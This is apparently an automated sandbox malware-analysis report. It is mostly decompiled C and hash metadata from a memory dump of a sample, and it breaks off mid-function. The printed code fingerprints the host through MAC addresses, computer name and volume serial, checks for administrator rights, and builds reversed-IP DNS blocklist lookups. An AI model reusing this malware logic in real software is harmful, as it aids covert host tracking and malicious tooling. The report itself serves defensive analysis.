                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7E6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction ID: 509e828b3008e3aab81c55c070a8947765e217c103e4db72dccbab3868dfdeb3
                                                                                                                                  • Opcode Fuzzy Hash: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction Fuzzy Hash: 614125F0E001299FDB64CF49D881BAEB7B4FF85314F40419AE188AB240C7785E85CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction ID: d1c1bcbb0fab2d3620b9ffaf9ec68e89214f902ffa806ae79501c52aa73867b1
                                                                                                                                  • Opcode Fuzzy Hash: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction Fuzzy Hash: 304106F1E001299FEF64CF49D881BAEB7B5FB85314F4445AAE188AB241C7385E81CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D4BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction ID: 42106033806ea7bb90f00517d68dc85ba1b5828fe851184c900f6de1efba4c70
                                                                                                                                  • Opcode Fuzzy Hash: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction Fuzzy Hash: ED41E2B1E05629DFEB24CF58DC89BAEB7B5FB84304F64859AD049A7240C7789E80CF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D46B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction ID: 6145f39c6fd3fe5de38c2efc57b572788e451d6dd513c70c114c2fbd8dd523f2
                                                                                                                                  • Opcode Fuzzy Hash: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction Fuzzy Hash: 2341E5B1E05228DFDB24CF58D889BAEB7B5BB85304F6481DAD009A7240C7789E80CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction ID: afea4893869f5e44770ec48f1c12b1aa2fdc6b311f9b05f0b74501ba197f70af
                                                                                                                                  • Opcode Fuzzy Hash: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction Fuzzy Hash: 8B4126F1E001299FDB64CF49D881BAEB7B4BB85314F4045DAE288A7201C7385E81CF1A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401AC3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}













                                                                                                                                  0x00401ad1
                                                                                                                                  0x00401ad4
                                                                                                                                  0x00401adc
                                                                                                                                  0x00401b6b
                                                                                                                                  0x00401b70
                                                                                                                                  0x00401b70
                                                                                                                                  0x00401aef
                                                                                                                                  0x00401af3
                                                                                                                                  0x00401b6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b6a
                                                                                                                                  0x00401af9
                                                                                                                                  0x00401afa
                                                                                                                                  0x00401afd
                                                                                                                                  0x00401b00
                                                                                                                                  0x00401b1c
                                                                                                                                  0x00401b22
                                                                                                                                  0x00401b27
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b09
                                                                                                                                  0x00401b12
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b17
                                                                                                                                  0x00401b18
                                                                                                                                  0x00401b1b
                                                                                                                                  0x00401b1b
                                                                                                                                  0x00401b2b
                                                                                                                                  0x00401b5b
                                                                                                                                  0x00401b5e
                                                                                                                                  0x00401b63
                                                                                                                                  0x00401b68
                                                                                                                                  0x00401b69
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b69
                                                                                                                                  0x00401b2d
                                                                                                                                  0x00401b32
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b37
                                                                                                                                  0x00401b3b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b3d
                                                                                                                                  0x00401b3d
                                                                                                                                  0x00401b4c
                                                                                                                                  0x00401b4f
                                                                                                                                  0x00401b50
                                                                                                                                  0x00401b54
                                                                                                                                  0x00401b54
                                                                                                                                  0x00401b57
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                                                                  • API String ID: 2574300362-1087626847
                                                                                                                                  • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                                                                  • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00408CEE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x413380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

















                                                                                                                                  0x00408cf2
                                                                                                                                  0x00408cf4
                                                                                                                                  0x00408cf6
                                                                                                                                  0x00408cfc
                                                                                                                                  0x00408dae
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408d08
                                                                                                                                  0x00408d13
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d1b
                                                                                                                                  0x00408d21
                                                                                                                                  0x00408d24
                                                                                                                                  0x00408d27
                                                                                                                                  0x00408d2a
                                                                                                                                  0x00408d2f
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da8
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d34
                                                                                                                                  0x00408d37
                                                                                                                                  0x00408d3c
                                                                                                                                  0x00408d50
                                                                                                                                  0x00408d6c
                                                                                                                                  0x00408d6f
                                                                                                                                  0x00408d78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7a
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d90
                                                                                                                                  0x00408d9e
                                                                                                                                  0x00408da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d90
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d5a
                                                                                                                                  0x00408d5f
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d46
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d83
                                                                                                                                  0x00408d84
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d89

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 536389180-2166502722
                                                                                                                                  • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                                                                  • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040BFCE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                                                                  • 0 v, xrefs: 0040BFD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
                                                                                                                                  • API String ID: 2424974917-2279882658
                                                                                                                                  • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                                                                  • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                                                                  0x00401bec
                                                                                                                                  0x00401bf2
                                                                                                                                  0x00401bf3
                                                                                                                                  0x00401bf4
                                                                                                                                  0x00401bf5
                                                                                                                                  0x00401bf7
                                                                                                                                  0x00401bf9
                                                                                                                                  0x00401bfc
                                                                                                                                  0x00401bfd
                                                                                                                                  0x00401c04
                                                                                                                                  0x00401c0b
                                                                                                                                  0x00401c1d
                                                                                                                                  0x00401c45
                                                                                                                                  0x00401c51
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c57
                                                                                                                                  0x00401c1f
                                                                                                                                  0x00401c24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c35
                                                                                                                                  0x00401c37
                                                                                                                                  0x00401c38
                                                                                                                                  0x00401c3f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c41
                                                                                                                                  0x00401c5e

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: hi_id$localcfg
                                                                                                                                  • API String ID: 2777991786-2393279970
                                                                                                                                  • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                                                                  • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406EDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0xffffffff
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0xffffffff
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}










                                                                                                                                  0x00406ee0
                                                                                                                                  0x00406eed
                                                                                                                                  0x00406f06
                                                                                                                                  0x00406f09
                                                                                                                                  0x00406f0f
                                                                                                                                  0x00406f15
                                                                                                                                  0x00406f1a
                                                                                                                                  0x00406f1c
                                                                                                                                  0x00406f1c
                                                                                                                                  0x00406f24
                                                                                                                                  0x00406f2c
                                                                                                                                  0x00406f36
                                                                                                                                  0x00406f36
                                                                                                                                  0x00406f3e
                                                                                                                                  0x00406f3e
                                                                                                                                  0x00406f44
                                                                                                                                  0x00406f4b
                                                                                                                                  0x00406f50
                                                                                                                                  0x00406f57
                                                                                                                                  0x00406f57
                                                                                                                                  0x00406f4b
                                                                                                                                  0x00406f5e

                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID: *p@
                                                                                                                                  • API String ID: 3429775523-2474123842
                                                                                                                                  • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                                                                  • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042A6F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A70D
                                                                                                                                    • Part of subcall function 004174B0: __getptd_noexit.LIBCMTD ref: 004174B6
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A71B
                                                                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 0042A788
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 4290476786-1018135373
                                                                                                                                  • Opcode ID: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction ID: 19b41c0f5f9f5006fc9355230a4f87480302ae86c7099d68876e55ecf8a42a62
                                                                                                                                  • Opcode Fuzzy Hash: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction Fuzzy Hash: 6A115878A00214ABCB04DF51E444A9E7BB2BF94315F94806AE8084B312C738DE92CB9A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
